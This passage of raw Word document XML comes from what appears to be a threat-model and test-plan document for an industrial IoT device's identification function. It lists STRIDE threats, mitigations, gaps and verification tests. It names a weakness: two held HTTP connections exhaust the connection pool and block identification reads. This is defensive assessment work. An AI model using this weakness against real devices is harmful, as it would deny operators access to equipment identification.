        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00921BF4" w:rsidRPr="00276049">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D (identification data- at all times)</w:t>
      </w:r>
      <w:r w:rsidR="00921BF4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="00997E9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F (Domain separation-availability dependency)</w:t>
      </w:r>
      <w:r w:rsidR="00921BF4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00921BF4" w:rsidRPr="00921BF4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00921BF4" w:rsidRPr="00276049">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H (IoT-Core service Availability);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4838CD51" w14:textId="777316A6" w:rsidR="00276049" w:rsidRPr="00276049" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00276049" w:rsidRPr="00276049">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Denial of Service</w:t>
      </w:r>
      <w:r w:rsidR="007E3134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00CE4956">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FF4D96" w14:textId="77777777" w:rsidR="00C825F3" w:rsidRPr="004C6315" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AF855B" w14:textId="422B0153" w:rsidR="004C6315" w:rsidRPr="004C6315" w:rsidRDefault="004C6315" w:rsidP="004C6315">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C6315">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Max 2 concurrent HTTP connections (SRIO-7909)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6315">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> intended as DoS protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039BD0D3" w14:textId="252D568A" w:rsidR="004C6315" w:rsidRPr="004C6315" w:rsidRDefault="004C6315" w:rsidP="004C6315">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C6315">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Incoming-only, no outgoing/subscription</w:t>
      </w:r>
      <w:r w:rsidR="00144991">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6315">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(SRIO-7908).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA6DD30" w14:textId="6223EBA2" w:rsidR="004C6315" w:rsidRPr="004C6315" w:rsidRDefault="004C6315" w:rsidP="004C6315">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C6315">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IoT-Core Visualizer (browser, by IP)</w:t>
      </w:r>
      <w:r w:rsidR="00144991">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6315">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(SRIO-7914)</w:t>
      </w:r>
      <w:r w:rsidR="00144991">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="004C6315">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>satisfies ‘easily accessible form’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA82BA" w14:textId="0AE375C1" w:rsidR="004C6315" w:rsidRPr="004D52F0" w:rsidRDefault="004C6315" w:rsidP="004C6315">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C6315">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP served by non-safety COM (QM) only</w:t>
      </w:r>
      <w:r w:rsidR="00144991">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: S</w:t>
      </w:r>
      <w:r w:rsidRPr="004C6315">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tated as a structural limitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26608933" w14:textId="77777777" w:rsidR="000B7634" w:rsidRPr="00BB47F9" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691EF51C" w14:textId="77777777" w:rsidR="00E57060" w:rsidRDefault="00231EB5" w:rsidP="00231EB5">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231EB5">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1</w:t>
      </w:r>
      <w:r w:rsidR="00E57060">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00231EB5">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identification is NOT available at all times: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2C849A" w14:textId="7304DD77" w:rsidR="00E57060" w:rsidRDefault="00231EB5" w:rsidP="00E57060">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231EB5">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(a) install reboot (/firmware/install </w:t>
      </w:r>
      <w:r w:rsidR="00E57060" w:rsidRPr="00E57060">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00231EB5">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> reboot, SRIO-2953); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F94E48" w14:textId="77777777" w:rsidR="00E57060" w:rsidRDefault="00231EB5" w:rsidP="00E57060">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231EB5">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(b) Init at every power-on before IoT-Core is up (SRIO-1417); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4F70E6" w14:textId="77777777" w:rsidR="009470E7" w:rsidRDefault="00231EB5" w:rsidP="00E57060">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231EB5">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(c) SCPU-flash window </w:t>
      </w:r>
      <w:r w:rsidR="00E57060" w:rsidRPr="00E57060">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00231EB5">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SCPU-sourced identifiers absent (SRIO-15759); (d) FatalError safe-state hold (SRIO-15757); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0600EFD6" w14:textId="0BF72E80" w:rsidR="00231EB5" w:rsidRPr="00231EB5" w:rsidRDefault="00231EB5" w:rsidP="00E57060">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231EB5">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(e) EMC disturbance</w:t>
      </w:r>
      <w:r w:rsidR="009470E7">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00231EB5">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the manufacturer’s own Criterion A/B concedes IoT-Core is ‘Not supervised … After the tests: IoT-Core access possible’ (SRIO-11573/11572).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFD9478" w14:textId="24F72CCD" w:rsidR="00231EB5" w:rsidRPr="00231EB5" w:rsidRDefault="00231EB5" w:rsidP="00231EB5">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231EB5">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r w:rsidR="009470E7">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00231EB5">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Two held/idle connections exhaust the pool (SRIO-7909) and block all further legitimate identification reads; incoming-only, no documented idle timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415F7751" w14:textId="1A02965D" w:rsidR="00231EB5" w:rsidRDefault="00231EB5" w:rsidP="00231EB5">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231EB5">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3 (no redundancy)</w:t>
      </w:r>
      <w:r w:rsidR="004D03E2">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00231EB5">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> A COM fault or SysCom timeout removes identification availability entirely while the safety function persists </w:t>
      </w:r>
      <w:r w:rsidR="004D03E2" w:rsidRPr="004D03E2">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00231EB5">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> identification is structurally LESS available than the safety function it describes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA97310" w14:textId="77777777" w:rsidR="003E7C2C" w:rsidRDefault="003E7C2C" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586859BC" w14:textId="77777777" w:rsidR="00903809" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBF3107" w14:textId="77777777" w:rsidR="00903809" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B521CA" w14:textId="77777777" w:rsidR="00903809" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D7A0B06" w14:textId="77777777" w:rsidR="00903809" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B366EBF" w14:textId="77777777" w:rsidR="00903809" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2921458A" w14:textId="77777777" w:rsidR="00903809" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42446AA0" w14:textId="77777777" w:rsidR="00903809" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1070244D" w14:textId="77777777" w:rsidR="00903809" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4FBDD0" w14:textId="77777777" w:rsidR="00903809" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBA8594" w14:textId="77777777" w:rsidR="00903809" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E81347" w14:textId="77777777" w:rsidR="00903809" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B9C28F" w14:textId="77777777" w:rsidR="00903809" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F8D5E79" w14:textId="77777777" w:rsidR="00903809" w:rsidRPr="003E7C2C" w:rsidRDefault="00903809" w:rsidP="003E7C2C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E60CFE3" w14:textId="3F1133BE" w:rsidR="009C0A46" w:rsidRPr="00276049" w:rsidRDefault="009C0A46" w:rsidP="00276049">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00276049">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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1285785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F28BAF" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE580F5"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6290FC50"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6F2C6393"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14F4E86E"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7F5798" w14:paraId="7E0FB40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56653CF" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61A9FA7F" w14:textId="53F9EB23" w:rsidR="00900880" w:rsidRPr="00AE568D" w:rsidRDefault="001979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E568D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Retrieve identification via IoT-Core + Visualizer in OPERATE; confirm human-readable, browser-accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50FBD338" w14:textId="18F48BB7" w:rsidR="00900880" w:rsidRPr="0002037B" w:rsidRDefault="00B54E5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2037B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Functional CR 7.8; confirms "easily accessible" </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67E2F990" w14:textId="2F79E37D" w:rsidR="00900880" w:rsidRPr="0002037B"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2037B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Requirements-based verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="098CEA93" w14:textId="008115F1" w:rsidR="00900880" w:rsidRPr="0002037B"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2037B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="00D258C9" w14:paraId="52B48BE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B7AA4AC" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26628F48" w14:textId="77777777" w:rsidR="00B7134D"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lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B7134D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Availability-across-states: continuously poll while driving Init (power-cycle), Update (999 + install reboot), FatalError; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B0C276F" w14:textId="6CA58EC2" w:rsidR="00900880" w:rsidRPr="00105368"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color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B7134D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>log outage windows + SCPU-flash window</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C51BC11" w14:textId="1E80D4AA" w:rsidR="00900880" w:rsidRPr="006F3081" w:rsidRDefault="00BB407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F3081">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-1 (not available "at all times"</w:t>
            </w:r>
            <w:r w:rsidR="00B7134D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r w:rsidRPr="006F3081">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>design, not attack)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76A8C3FF" w14:textId="3676EFEE" w:rsidR="00900880" w:rsidRPr="007E4FD1"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4FD1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 §3.2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4373F616" w14:textId="0E31FC95" w:rsidR="00900880" w:rsidRPr="007E4FD1"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4FD1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
